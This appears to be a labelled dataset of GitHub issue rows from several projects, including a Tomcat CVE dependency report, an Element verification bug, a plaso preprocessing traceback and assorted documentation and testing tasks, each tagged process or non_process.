Dependency Hierarchy:
- spring-boot-starter-web-2.1.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.1.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.21.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.31.jar</b></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/route_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.31/tomcat-embed-core-9.0.31.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.5.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.5.RELEASE.jar
- :x: **tomcat-embed-core-9.0.31.jar** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
<p>Publish Date: 2021-09-16</p>
<p>URL: <a href=https://www.mend.io/vulnerability-database/CVE-2021-41079>CVE-2021-41079</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://tomcat.apache.org/security-10.html">https://tomcat.apache.org/security-10.html</a></p>
<p>Release Date: 2021-09-16</p>
<p>Fix Resolution (org.apache.tomcat.embed:tomcat-embed-core): 9.0.44</p>
<p>Direct dependency fix Resolution (org.springframework.boot:spring-boot-starter-web): 2.3.10.RELEASE</p>
</p>
</details>
<p></p>
***
:rescue_worker_helmet: Automatic Remediation is available for this issue | True | CVE-2021-41079 (High) detected in multiple libraries - ## CVE-2021-41079 - High Severity Vulnerability
:rescue_worker_helmet: Automatic Remediation is available for this issue | non_process | cve high detected in multiple libraries cve high severity vulnerability vulnerable libraries tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar tomcat embed core jar core tomcat implementation library home page a href path to dependency file services elastic ip manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services network acl manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core 
jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services security group manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services vpc manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library tomcat embed core jar core tomcat implementation library home page a href path to dependency file services route manager pom xml path to vulnerable library home wss scanner repository org apache tomcat embed tomcat embed core tomcat embed core jar dependency hierarchy spring boot starter web release jar root library spring boot starter tomcat release jar x tomcat embed core jar vulnerable library found in base branch master vulnerability details apache tomcat to to and to did not properly validate incoming tls packets when tomcat was configured to use nio openssl or openssl for tls a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution 
org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release fix resolution org apache tomcat embed tomcat embed core direct dependency fix resolution org springframework boot spring boot starter web release rescue worker helmet automatic remediation is available for this issue | 0 |
70,297 | 23,108,090,820 | IssuesEvent | 2022-07-27 10:34:20 | vector-im/element-web | https://api.github.com/repos/vector-im/element-web | opened | Verification between Desktop <> Web takes a few minutes to show emoji | T-Defect | ### Steps to reproduce
1. From desktop, go to Settings -> Security & Privacy, then trigger the desktop session to be verified
2. Accept verification request from the web session
3. Start verification process
### Outcome
#### What did you expect?
Next dialogs are quick to load during the verification process
#### What happened instead?
At the point when the emoji should have been shown, the desktop session continued asking me to accept the verification request from another session, while the web session says it's waiting for the desktop session.
After ~5 minutes, the emoji dialogs popped up in both apps.
### Operating system
Arch Linux
### Application version
Element version: 1.10.0
### How did you install the app?
Flatpak
### Homeserver
_No response_
### Will you send logs?
Yes | 1.0 | Verification between Desktop <> Web takes a few minutes to show emoji - ### Steps to reproduce
Yes | non_process | verification between desktop web takes a few minutes to show emoji steps to reproduce from desktop go to settings security privacy then trigger the desktop session to be verified accept verification request from the web session start verification process outcome what did you expect next dialogs are quick to load during the verification process what happened instead at the point when the emoji should have been shown the desktop session continued asking me to accept the verification request from another session while the web session says it s waiting for the desktop session after minutes the emoji dialogs popped up in both apps operating system arch linux application version element version how did you install the app flatpak homeserver no response will you send logs yes | 0 |
13,841 | 3,778,718,196 | IssuesEvent | 2016-03-18 02:34:30 | NREL/EnergyPlus | https://api.github.com/repos/NREL/EnergyPlus | closed | Eng. Ref. calculation revisions for Fanger PMV (Ticket 9598) | Documentation Sources Priority S2 - Medium | Eng. Ref. does not include changes to the Fanger model based on ASHRAE 55 updates. See pg. 1195 of V8.1 Eng. Ref. and subroutine CalcThermalComfortFanger in ThermalComfort.cc
| 1.0 | Eng. Ref. calculation revisions for Fanger PMV (Ticket 9598) - Eng. Ref. does not include changes to the Fanger model based on ASHRAE 55 updates. See pg. 1195 of V8.1 Eng. Ref. and subroutine CalcThermalComfortFanger in ThermalComfort.cc
| non_process | eng ref calculation revisions for fanger pmv ticket eng ref does not include changes to the fanger model based on ashrae updates see pg of eng ref and subroutine calcthermalcomfortfanger in thermalcomfort cc | 0 |
462,888 | 13,255,770,503 | IssuesEvent | 2020-08-20 11:32:40 | dwyl/smart-home-security-system | https://api.github.com/repos/dwyl/smart-home-security-system | opened | Registering a device on connection errors | T1h bug priority-1 | Smart hub is set up to register devices when they first connect, however I've since changed some attributes which has broken this:
```
2020-08-20T11:23:15.965480+00:00 app[web.1]: 11:23:15.965 [error] an exception was raised:
2020-08-20T11:23:15.965481+00:00 app[web.1]: ** (ArgumentError) argument error
2020-08-20T11:23:15.965482+00:00 app[web.1]: :erlang.apply({:error, #Ecto.Changeset<action: :insert, changes: %{serial: "Toms-MacBook-Pro"}, errors: [feature_flags: {"can't be blank", [validation: :required]}], data: #SmartHomeAuth.Access.Door<>, valid?: false>}, :uuid, [])
```
I need to revisit the device creation logic | 1.0 | Registering a device on connection errors - Smart hub is set up to register devices when they first connect, however I've since changed some attributes which has broken this:
I need to revisit the device creation logic | non_process | registering a device on connection errors smart hub is set up to register devices when they first connect however i ve since changed some attributes which has broken this app an exception was raised app argumenterror argument error app erlang apply error ecto changeset valid false uuid i need to revisit the device creation logic | 0 |
92,485 | 8,365,414,838 | IssuesEvent | 2018-10-04 04:59:24 | zcash/zcash | https://api.github.com/repos/zcash/zcash | opened | Update boost tests where necessary for any Sapling changes to RPC parameters | RPC interface Sapling testing | For example:
> In regards to BOOST_AUTO_TEST_CASE(rpc_z_listunspent_parameters), the parameters have not changed. We could add some lines to get a new sapling address and then test that we do not throw when we pass that in,
via https://github.com/zcash/zcash/pull/3510#issuecomment-426704906
| 1.0 | Update boost tests where necessary for any Sapling changes to RPC parameters - For example:
| non_process | update boost tests where necessary for any sapling changes to rpc parameters for example in regards to boost auto test case rpc z listunspent parameters the parameters have not changed we could add some lines to get a new sapling address and then test that we do not throw when we pass that in via | 0 |
124,916 | 10,329,739,860 | IssuesEvent | 2019-09-02 12:59:20 | rust-lang/rust | https://api.github.com/repos/rust-lang/rust | closed | libtest output for common CI systems | A-libtest C-feature-request | It would be useful if `libtest` would write a file in a format supported by CI systems.
Based on [AppVeyor](https://www.appveyor.com/docs/running-tests/#uploading-xml-test-results) and [VSTS](https://docs.microsoft.com/en-us/vsts/pipelines/tasks/test/publish-test-results?view=vsts), it looks like `junit` or `xunit3` could be good choices. | 1.0 | libtest output for common CI systems - It would be useful if `libtest` would write a file in a format supported by CI systems.
Based on [AppVeyor](https://www.appveyor.com/docs/running-tests/#uploading-xml-test-results) and [VSTS](https://docs.microsoft.com/en-us/vsts/pipelines/tasks/test/publish-test-results?view=vsts), it looks like `junit` or `xunit3` could be good choices. | non_process | libtest output for common ci systems it would be useful if libtest would write a file in a format supported by ci systems based on and it looks like junit or could be good choices | 0 |
3,830 | 6,802,428,831 | IssuesEvent | 2017-11-02 20:10:30 | gratipay/inside.gratipay.com | https://api.github.com/repos/gratipay/inside.gratipay.com | closed | Limit Gratipay's copyright license in Terms of Service (TOS) | Governance & Process | Reticketed from https://github.com/gratipay/inside.gratipay.com/issues/204#issuecomment-102103817
> - Personally, I find using CC0 for Gratipay.com in §6.1 as a really nice touch and a fresh approach. I take it you do understand the implications of this, though.
> - Staying on the topic of copyright, in §7.1 the copyright license that Participant grants to Gratipay is relatively broad to what Gratipay actiually needs at the time. While §7.2 clarifies what this license permits Gratipay to do, I would welcome a provision where it explicitly stated for which purposes Gratipay may use it. | 1.0 | Limit Gratipay's copyright license in Terms of Service (TOS) - Reticketed from https://github.com/gratipay/inside.gratipay.com/issues/204#issuecomment-102103817
> - Staying on the topic of copyright, in §7.1 the copyright license that Participant grants to Gratipay is relatively broad to what Gratipay actiually needs at the time. While §7.2 clarifies what this license permits Gratipay to do, I would welcome a provision where it explicitly stated for which purposes Gratipay may use it. | process | limit gratipay s copyright license in terms of service tos reticketed from personally i find using for gratipay com in § as a really nice touch and a fresh approach i take it you do understand the implications of this though staying on the topic of copyright in § the copyright license that participant grants to gratipay is relatively broad to what gratipay actiually needs at the time while § clarifies what this license permits gratipay to do i would welcome a provision where it explicitly stated for which purposes gratipay may use it | 1 |
7,827 | 11,007,607,933 | IssuesEvent | 2019-12-04 08:53:22 | geneontology/go-ontology | https://api.github.com/repos/geneontology/go-ontology | opened | Obsolete modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction and children | multi-species process obsoletion | Dear all,
The proposal has been made to obsolete:
* GO:0075115 modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075117 negative regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
* GO:0075116 positive regulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction
There are no annotations, no mappings to this term. This term is not present in any slims.
The reason for obsoletion is that there is no evidence that this process exists. The only example I am aware of of transmembrane receptor-mediated cAMP signal transduction is in Dictyotelium, and there is no symbiont known to interfere with this pathway.
Any comments can be added to the issue: https://github.com/geneontology/go-ontology/issues/.
We are opening a comment period for this proposed obsoletion. We’d like to proceed and obsolete this term on December 10th, 2019. Unless objections are received by December 10th, 2019, we will assume that you agree to this change.
Thanks, Pascale | 1.0 | Obsolete modulation by symbiont of host transmembrane receptor-mediated cAMP signal transduction and children - Dear all,
Thanks, Pascale | process | obsolete modulation by symbiont of host transmembrane receptor mediated camp signal transduction and children dear all the proposal has been made to obsolete go modulation by symbiont of host transmembrane receptor mediated camp signal transduction go negative regulation by symbiont of host transmembrane receptor mediated camp signal transduction go positive regulation by symbiont of host transmembrane receptor mediated camp signal transduction there are no annotations no mappings to this term this term is not present in any slims the reason for obsoletion is that there is no evidence that this process exists the only example i am aware of of transmembrane receptor mediated camp signal transduction is in dictyotelium and there is no symbiont known to interfere with this pathway any comments can be added to the issue we are opening a comment period for this proposed obsoletion we’d like to proceed and obsolete this term on december unless objections are received by december we will assume that you agree to this change thanks pascale | 1 |
295,316 | 22,207,497,858 | IssuesEvent | 2022-06-07 16:01:15 | defenseunicorns/zarf-package-software-factory | https://api.github.com/repos/defenseunicorns/zarf-package-software-factory | closed | Define backup strategy for GitLab, Jenkins, Jira, Confluence, and Nexus | documentation enhancement stability | We need to define the backup strategy, starting with GitLab, Jenkins, Jira, Confluence, and Nexus. This will need some thought and investigation, and likely an ADR
Outcome of this issue should be new issues for setting up, documenting, and testing backup and restore for each of the above services
Notes:
- Our first early adopter that is driving a lot of the timelines right now plans to use RDS and S3 rather than Postgres Operator and Minio. If there are ways for us to save time by assuming RDS and S3 usage when defining the backup strategy that would help our first user out by accelerating the timeline.
- The long term plan for this package is that Minio will be provided as the object-storage solution and Postgres Operator the database solution, with the opportunity to switch to AWS S3 and RDS if the user wants to. This will also help with local development, by not making RDS and S3 a dependency on using this thing.
- Long term, we'd like the docs to read something like "Here's how to do backup and restore assuming you are running in an airgap, using Minio and Postgres Operator. If you're able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of RDS and S3 wherever databases and s3 storage are used". | 1.0 | Define backup strategy for GitLab, Jenkins, Jira, Confluence, and Nexus - We need to define the backup strategy, starting with GitLab, Jenkins, Jira, Confluence, and Nexus. This will need some thought and investigation, and likely an ADR
- Long term, we'd like the docs to read something like "Here's how to do backup and restore assuming you are running in an airgap, using Minio and Postgres Operator. If you're able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of RDS and S3 wherever databases and s3 storage are used". | non_process | define backup strategy for gitlab jenkins jira confluence and nexus we need to define the backup strategy starting with gitlab jenkins jira confluence and nexus this will need some thought and investigation and likely an adr outcome of this issue should be new issues for setting up documenting and testing backup and restore for each of the above services notes our first early adopter that is driving a lot of the timelines right now plans to use rds and rather than postgres operator and minio if there are ways for us to save time by assuming rds and usage when defining the backup strategy that would help our first user out by accelerating the timeline the long term plan for this package is that minio will be provided as the object storage solution and postgres operator the database solution with the opportunity to switch to aws and rds if the user wants to this will also help with local development by not making rds and a dependency on using this thing long term we d like the docs to read something like here s how to do backup and restore assuming you are running in an airgap using minio and postgres operator if you re able to utilize cloud services here is an alternate guide on how to do backup and restore assuming the use of rds and wherever databases and storage are used | 0 |
40,657 | 5,247,079,834 | IssuesEvent | 2017-02-01 11:45:57 | justarrived/just-match-web | https://api.github.com/repos/justarrived/just-match-web | closed | Redesign sidebar navigation and language selector | needs design | ## Old design
<img width="525" alt="screen shot 2016-12-20 at 15 28 56" src="https://cloud.githubusercontent.com/assets/922411/22022879/127e40b4-dcc4-11e6-9b92-da2b2ccb0297.png">
<img width="567" alt="screen shot 2016-12-20 at 15 27 40" src="https://cloud.githubusercontent.com/assets/922411/22022884/14b9e6d0-dcc4-11e6-83b1-e2e4adf4acaf.png">
| 1.0 | Redesign sidebar navigation and language selector - ## Old design
<img width="525" alt="screen shot 2016-12-20 at 15 28 56" src="https://cloud.githubusercontent.com/assets/922411/22022879/127e40b4-dcc4-11e6-9b92-da2b2ccb0297.png">
<img width="567" alt="screen shot 2016-12-20 at 15 27 40" src="https://cloud.githubusercontent.com/assets/922411/22022884/14b9e6d0-dcc4-11e6-83b1-e2e4adf4acaf.png">
| non_process | redesign sidebar navigation and language selector old design img width alt screen shot at src img width alt screen shot at src | 0 |
8,906 | 12,013,698,100 | IssuesEvent | 2020-04-10 09:29:27 | topcoder-platform/community-app | https://api.github.com/repos/topcoder-platform/community-app | opened | My Submissions page: Submissions not showing up | Dev Env submissions processor | Register to a design challenge and upload a submission (user :TCConnCopilot). Click on "View My Submissions" button. The recently uploaded submission is not displayed. The "View Submissions" button is also not available from the challenge details page. The user gets the submission confirmation email though. Please see video for reference.
https://drive.google.com/open?id=1LT2zMv4wkOff411FLPWW1HLAVMc5TuoP
The submission flow works fine for other users (dan_developer, tonyj, etc.). The issue happens when the user uploads the submission soon after registration.
| 1.0 | My Submissions page: Submissions not showing up - Register to a design challenge and upload a submission (user :TCConnCopilot). Click on "View My Submissions" button. The recently uploaded submission is not displayed. The "View Submissions" button is also not available from the challenge details page. The user gets the submission confirmation email though. Please see video for reference.
https://drive.google.com/open?id=1LT2zMv4wkOff411FLPWW1HLAVMc5TuoP
The submission flow works fine for other users(dan_developer, tonyj etc). The issue happens when the user uploads the submission soon after registration.
| process | my submissions page submissions not showing up register to a design challenge and upload a submission user tcconncopilot click on view my submissions button the recently uploaded submission is not displayed the view submissions button is also not available from the challenge details page the user gets the submission confirmation email though please see video for reference the submission flow works fine for other users dan developer tonyj etc the issue happens when the user uploads the submission soon after registration | 1 |
4,440 | 2,724,805,435 | IssuesEvent | 2015-04-14 19:53:36 | w3c/csvw | https://api.github.com/repos/w3c/csvw | closed | tests for public sector roles and salaries need updating | Test suite | @gkellogg - once again, fantastic (herculean) efforts with the test suite (PR #494 etc.).
I see that you have updated tests 034 and 035 (public sector roles & salaries - standard and minimal output) based on the changes in the csv2* doc. (many thanks)
Reading the [test run instructions][1] I see that the description/manifest for 034 and 035 (json, rdf and validation) need to be updated to take account of the moved files and the addition of the organization info... e.g.
```
Implicit
test034/senior-roles.csv test034/senior-roles.json test034/junior-roles.csv test034/junior-roles.json test034/gov.uk/professions.csv
```
changes to
```
Implicit
test034/senior-roles.csv test034/gov.uk/schema/senior-roles.json test034/junior-roles.csv test034/gov.uk/schema/junior-roles.json test034/gov.uk/data/organizations.csv test034/gov.uk/schema/organizations.json test034/gov.uk/data/professions.csv test034/gov.uk/schema/professions.json
```
Also, you should remove the `senior-roles.json` and `junior-roles.json` schema descriptions in the root directory for the test. (you already created a copy in `gov.uk/schema/` for each).
Didn't know how best you wanted to pursue these changes - hence raising an ISSUE rather than proposing a PR.
[1]:http://w3c.github.io/csvw/tests/ | 1.0 | tests for public sector roles and salaries need updating - @gkellogg - once again, fantastic (herculean) efforts with the test suite (PR #494 etc.).
I see that you have updated tests 034 and 035 (public sector roles & salaries - standard and minimal output) based on the changes in the csv2* doc. (many thanks)
Reading the [test run instructions][1] I see that the description/manifest for 034 and 035 (json, rdf and validation) need to be updated to take account of the moved files and the addition of the organization info... e.g.
```
Implicit
test034/senior-roles.csv test034/senior-roles.json test034/junior-roles.csv test034/junior-roles.json test034/gov.uk/professions.csv
```
changes to
```
Implicit
test034/senior-roles.csv test034/gov.uk/schema/senior-roles.json test034/junior-roles.csv test034/gov.uk/schema/junior-roles.json test034/gov.uk/data/organizations.csv test034/gov.uk/schema/organizations.json test034/gov.uk/data/professions.csv test034/gov.uk/schema/professions.json
```
Also, you should remove the `senior-roles.json` and `junior-roles.json` schema descriptions in the root directory for the test. (you already created a copy in `gov.uk/schema/` for each).
Didn't know how best you wanted to pursue these changes - hence raising an ISSUE rather than proposing a PR.
[1]:http://w3c.github.io/csvw/tests/ | non_process | tests for public sector roles and salaries need updating gkellogg once again fantastic herculean efforts with the test suite pr etc i see that you have updated tests and public sector roles salaries standard and minimal output based on the changes in the doc many thanks reading the i see that the description manifest for and json rdf and validation need to be updated to take account of the moved files and the addition of the organization info e g implicit senior roles csv senior roles json junior roles csv junior roles json gov uk professions csv changes to implicit senior roles csv gov uk schema senior roles json junior roles csv gov uk schema junior roles json gov uk data organizations csv gov uk schema organizations json gov uk data professions csv gov uk schema professions json also you should remove the senior roles json and junior roles json schema descriptions in the root directory for the test you already created a copy in gov uk schema for each didn t know how best you wanted to pursue these changes hence raising an issue rather than proposing a pr | 0 |
8,311 | 11,472,182,565 | IssuesEvent | 2020-02-09 15:50:29 | log2timeline/plaso | https://api.github.com/repos/log2timeline/plaso | closed | Preprocessing fails with WindowsHostnamePlugin | enhancement preprocessing | I got a Win2k image that fails to process with the following exception:
```shell
root@7e56f81805b2:/tmp# log2timeline.py -d --status_view linear test.plaso /tmp/image.vmdk
2020-02-06 09:45:05,255 [INFO] (MainProcess) PID:69 <data_location> Determined data location: /usr/share/plaso
2020-02-06 09:45:05,282 [INFO] (MainProcess) PID:69 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OK]
Source path : /tmp/image.vmdk
Source type : storage media image
Processing time : 00:00:00
Processing started.
Traceback (most recent call last):
File "/usr/bin/log2timeline.py", line 87, in <module>
if not Main():
File "/usr/bin/log2timeline.py", line 67, in Main
tool.ExtractEventsFromSources()
File "/usr/lib/python3/dist-packages/plaso/cli/log2timeline_tool.py", line 414, in ExtractEventsFromSources
self._PreprocessSources(extraction_engine)
File "/usr/lib/python3/dist-packages/plaso/cli/extraction_tool.py", line 218, in _PreprocessSources
resolver_context=self._resolver_context)
File "/usr/lib/python3/dist-packages/plaso/engine/engine.py", line 272, in PreprocessSources
self.knowledge_base)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 328, in RunPlugins
artifacts_registry, knowledge_base, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 196, in CollectFromWindowsRegistry
preprocess_plugin.Collect(knowledge_base, artifact_definition, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 243, in Collect
self._ParseKey(knowledge_base, registry_key, value_name)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 276, in _ParseKey
self._ParseValueData(knowledge_base, value_object)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/windows.py", line 266, in _ParseValueData
type(value_data), self.ARTIFACT_DEFINITION_NAME))
TypeError: unsupported format string passed to type.__format__
root@7e56f81805b2:/tmp# zcat log2timeline-20200206T095205.log.gz
2020-02-06 09:52:05,465 [DEBUG] (MainProcess) PID:101 <extraction_tool> Starting preprocessing.
2020-02-06 09:52:07,699 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxHostnameFile
2020-02-06 09:52:07,705 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxDistributionRelease
2020-02-06 09:52:07,714 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxIssueFile
2020-02-06 09:52:07,719 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLSBRelease
2020-02-06 09:52:07,721 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxSystemdOSRelease
2020-02-06 09:52:07,727 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLocalTime
2020-02-06 09:52:07,730 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxPasswdFile
2020-02-06 09:52:07,733 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemConfigurationPreferencesPlistFile
2020-02-06 09:52:07,737 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSKeyboardLayoutPlistFile
2020-02-06 09:52:07,739 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemVersionPlistFile
2020-02-06 09:52:07,742 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSLocalTime
2020-02-06 09:52:07,747 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSUserPasswordHashesPlistFiles
2020-02-06 09:52:07,755 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableSystemRoot
2020-02-06 09:52:07,763 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: systemroot to: "\WINNT"
2020-02-06 09:52:07,769 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableWinDir
2020-02-06 09:52:07,773 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: windir to: "\WINNT"
2020-02-06 09:52:07,778 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsEnvironmentVariableAllUsersProfile
2020-02-06 09:52:08,449 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: allusersprofile to: "All Users"
2020-02-06 09:52:08,451 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsAvailableTimeZones
2020-02-06 09:52:08,492 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsCodePage
2020-02-06 09:52:09,203 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsComputerName
root@7e56f81805b2:/tmp# log2timeline.py --version
plaso - log2timeline version 20200121
```
If it helps, `type(value_data)` at this point is `pyregf.multi_string`
Environment is the `log2timeline/plaso:20200121` docker image.
| 1.0 | Preprocessing fails with WindowsHostnamePlugin - I got a Win2k image that fails to process with the following exception:
```shell
root@7e56f81805b2:/tmp# log2timeline.py -d --status_view linear test.plaso /tmp/image.vmdk
2020-02-06 09:45:05,255 [INFO] (MainProcess) PID:69 <data_location> Determined data location: /usr/share/plaso
2020-02-06 09:45:05,282 [INFO] (MainProcess) PID:69 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OK]
Source path : /tmp/image.vmdk
Source type : storage media image
Processing time : 00:00:00
Processing started.
Traceback (most recent call last):
File "/usr/bin/log2timeline.py", line 87, in <module>
if not Main():
File "/usr/bin/log2timeline.py", line 67, in Main
tool.ExtractEventsFromSources()
File "/usr/lib/python3/dist-packages/plaso/cli/log2timeline_tool.py", line 414, in ExtractEventsFromSources
self._PreprocessSources(extraction_engine)
File "/usr/lib/python3/dist-packages/plaso/cli/extraction_tool.py", line 218, in _PreprocessSources
resolver_context=self._resolver_context)
File "/usr/lib/python3/dist-packages/plaso/engine/engine.py", line 272, in PreprocessSources
self.knowledge_base)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 328, in RunPlugins
artifacts_registry, knowledge_base, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/manager.py", line 196, in CollectFromWindowsRegistry
preprocess_plugin.Collect(knowledge_base, artifact_definition, searcher)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 243, in Collect
self._ParseKey(knowledge_base, registry_key, value_name)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/interface.py", line 276, in _ParseKey
self._ParseValueData(knowledge_base, value_object)
File "/usr/lib/python3/dist-packages/plaso/preprocessors/windows.py", line 266, in _ParseValueData
type(value_data), self.ARTIFACT_DEFINITION_NAME))
TypeError: unsupported format string passed to type.__format__
root@7e56f81805b2:/tmp# zcat log2timeline-20200206T095205.log.gz
2020-02-06 09:52:05,465 [DEBUG] (MainProcess) PID:101 <extraction_tool> Starting preprocessing.
2020-02-06 09:52:07,699 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxHostnameFile
2020-02-06 09:52:07,705 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxDistributionRelease
2020-02-06 09:52:07,714 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxIssueFile
2020-02-06 09:52:07,719 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLSBRelease
2020-02-06 09:52:07,721 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxSystemdOSRelease
2020-02-06 09:52:07,727 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxLocalTime
2020-02-06 09:52:07,730 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: LinuxPasswdFile
2020-02-06 09:52:07,733 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemConfigurationPreferencesPlistFile
2020-02-06 09:52:07,737 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSKeyboardLayoutPlistFile
2020-02-06 09:52:07,739 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSSystemVersionPlistFile
2020-02-06 09:52:07,742 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSLocalTime
2020-02-06 09:52:07,747 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: MacOSUserPasswordHashesPlistFiles
2020-02-06 09:52:07,755 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableSystemRoot
